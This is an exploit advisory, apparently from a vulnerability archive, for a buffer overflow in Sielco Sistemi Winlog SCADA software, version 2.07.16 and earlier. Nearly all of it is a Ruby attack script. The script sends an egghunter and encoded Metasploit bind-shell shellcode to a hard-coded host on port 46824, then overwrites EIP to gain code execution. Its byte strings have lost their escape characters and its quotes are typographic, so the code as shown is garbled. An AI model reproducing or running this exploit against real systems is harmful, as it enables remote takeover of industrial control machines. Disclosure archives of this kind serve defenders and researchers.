Sielco Sistemi Winlog Buffer Overflow Vulnerability

Summary

Sielco Sistemi Winlog suffers from buffer overflow vulnerability

Credit:

Details

Vulnerable Systems:
 * Sielco Sistemi Winlog version 2.07.16 and prior

require ‘socket’

port = ‘46824’
host = ‘10.8.28.37’

s = TCPSocket.open(host,port)

sleep(0.5)

egghunter = ‘x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74’
egghunter << ‘xefxb8x77x6fx6fx74x8bxfaxafx75xeaxafx75xe7xffxe7’

# msfpayload windows/shell_bind_tcp R | msfencode -t ruby
#[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)
shellcode =
‘xdbxc8xd9x74x24xf4x5bxbax45x76x08xf1x33xc9’ +
‘xb1x56x31x53x18x83xebxfcx03x53x51x94xfdx0d’ +
‘xb1xd1xfexedx41x82x77x08x70x90xecx58x20x24’ +
‘x66x0cxc8xcfx2axa5x5bxbdxe2xcaxecx08xd5xe5’ +
‘xedxbcxd9xaax2dxdexa5xb0x61x00x97x7ax74x41’ +
‘xd0x67x76x13x89xecx24x84xbexb1xf4xa5x10xbe’ +
‘x44xdex15x01x30x54x17x52xe8xe3x5fx4ax83xac’ +
‘x7fx6bx40xafxbcx22xedx04x36xb5x27x55xb7x87’ +
‘x07x3ax86x27x8ax42xcex80x74x31x24xf3x09x42’ +
‘xffx89xd5xc7xe2x2ax9ex70xc7xcbx73xe6x8cxc0’ +
‘x38x6cxcaxc4xbfxa1x60xf0x34x44xa7x70x0ex63’ +
‘x63xd8xd5x0ax32x84xb8x33x24x60x65x96x2ex83’ +
‘x72xa0x6cxccxb7x9fx8ex0cxdfxa8xfdx3ex40x03’ +
‘x6ax73x09x8dx6dx74x20x69xe1x8bxcax8ax2bx48’ +
‘x9exdax43x79x9exb0x93x86x4bx16xc4x28x23xd7’ +
‘xb4x88x93xbfxdex06xccxa0xe0xccx7bxe7x2ex34’ +
‘x28x80x52xcaxdfx0cxdax2cxb5xbcx8axe7x21x7f’ +
‘xe9x3fxd6x80xdbx13x4fx17x53x7ax57x18x64xa8’ +
‘xf4xb5xccx3bx8exd5xc8x5ax91xf3x78x14xaax94’ +
‘xf3x48x79x04x03x41xe9xa5x96x0exe9xa0x8ax98’ +
‘xbexe5x7dxd1x2ax18x27x4bx48xe1xb1xb4xc8x3e’ +
‘x02x3axd1xb3x3ex18xc1x0dxbex24xb5xc1xe9xf2’ +
‘x63xa4x43xb5xddx7ex3fx1fx89x07x73xa0xcfx07’ +
‘x5ex56x2fxb9x37x2fx50x76xd0xa7x29x6ax40x47’ +
‘xe0x2ex70x02xa8x07x19xcbx39x1ax44xecx94x59’ +
‘x71x6fx1cx22x86x6fx55x27xc2x37x86x55x5bxd2’ +
‘xa8xcax5cxf7’

puts ‘placing the shellcode’
buffer = ‘x41’ * 2000
buffer << ‘wootwoot’ #egg
buffer << ‘x90’
buffer << shellcode
buffer << ‘x90’ * 2000
print ‘buffer length: #{buffer.length}rn’
s.puts(buffer)

puts ‘sleeping …’
sleep(5)

puts ‘kicking …’
buffer = ‘x41’ * 20 + ‘x14’ * 10 + ‘x41’ * 167
buffer << ‘xdfx53x51x40’ #EIP -> Jmp ESP – Vclx40.bpl – 0x405153df
buffer << ‘x90’
buffer << egghunter
buffer << ‘x90’ * (59 – egghunter.length)
print ‘buffer length: #{buffer.length}rn’
s.puts(buffer)

Disclosure Timeline:
Published: 2012-06-05

Categories: Exploits